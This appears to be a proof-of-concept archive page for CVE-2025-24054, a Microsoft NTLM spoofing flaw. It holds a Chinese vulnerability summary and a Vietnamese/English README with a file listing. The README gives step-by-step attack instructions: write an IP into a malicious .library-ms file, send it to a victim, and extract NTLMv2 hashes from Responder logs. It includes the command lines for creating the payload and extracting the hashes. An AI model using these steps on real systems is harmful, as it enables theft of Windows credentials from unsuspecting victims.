Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24054 PoC — Microsoft NTLM 安全漏洞

Source
Associated Vulnerability
Title:Microsoft NTLM 安全漏洞 (CVE-2025-24054)
Description:Microsoft NTLM是美国微软(Microsoft)公司的一个在包括运行Windows操作系统的系统以及独立系统在内的网络上使用的身份验证协议。 Microsoft NTLM存在安全漏洞。攻击者利用该漏洞执行欺骗攻击。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server 2019 (
Description
CVE 2025 24054
Readme
## VIETNAMESE ##
- Với file CVE-2025-24054.py và  Exploit.library-ms
- Thay ip vào file Exploit.library-ms gửi file cho sau đó chạy CVE-2025-24054.py là OK 
- Đối với ELAINA-POC.py
- Tạo file .library-ms độc hại:
 - python3 ELAINA-POC.py create -ip 192.168.1.100 -o payload.library-ms -
- gửi victim 
Trích xuất hash từ log Responder:
- python3 ELAINA-POC.py extract -f /path/to/Responder/logs/SMB-NTLMv2.lo -
## English ##
- With the file CVE-2025-24054.Py and Exploit.library-MS
- Replace IP to File Exploit.library-MS, send the file and then run CVE-2025-24054.Py is ok
- For elaina-poc.py
- Create a toxic .library-MS file: 
- Python3 Elaina -Poc.py Create -ip 192.168.1.100 -O Payload.library -MS -
- Send Victim
 -Extract the hash from log Responder:
-Python3 Elaina-poc.py Extract -f /path/to/responder/logs/smb-ntlmv2.lo -
File Snapshot

[4.0K] /data/pocs/218038ba0d949453d1ab89ed6c6ab7f1dcbfe579 ├── [ 518] CVE-2025-24054.py ├── [3.4K] ELAINA-POC.py ├── [ 690] Exploit.library-ms └── [ 861] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.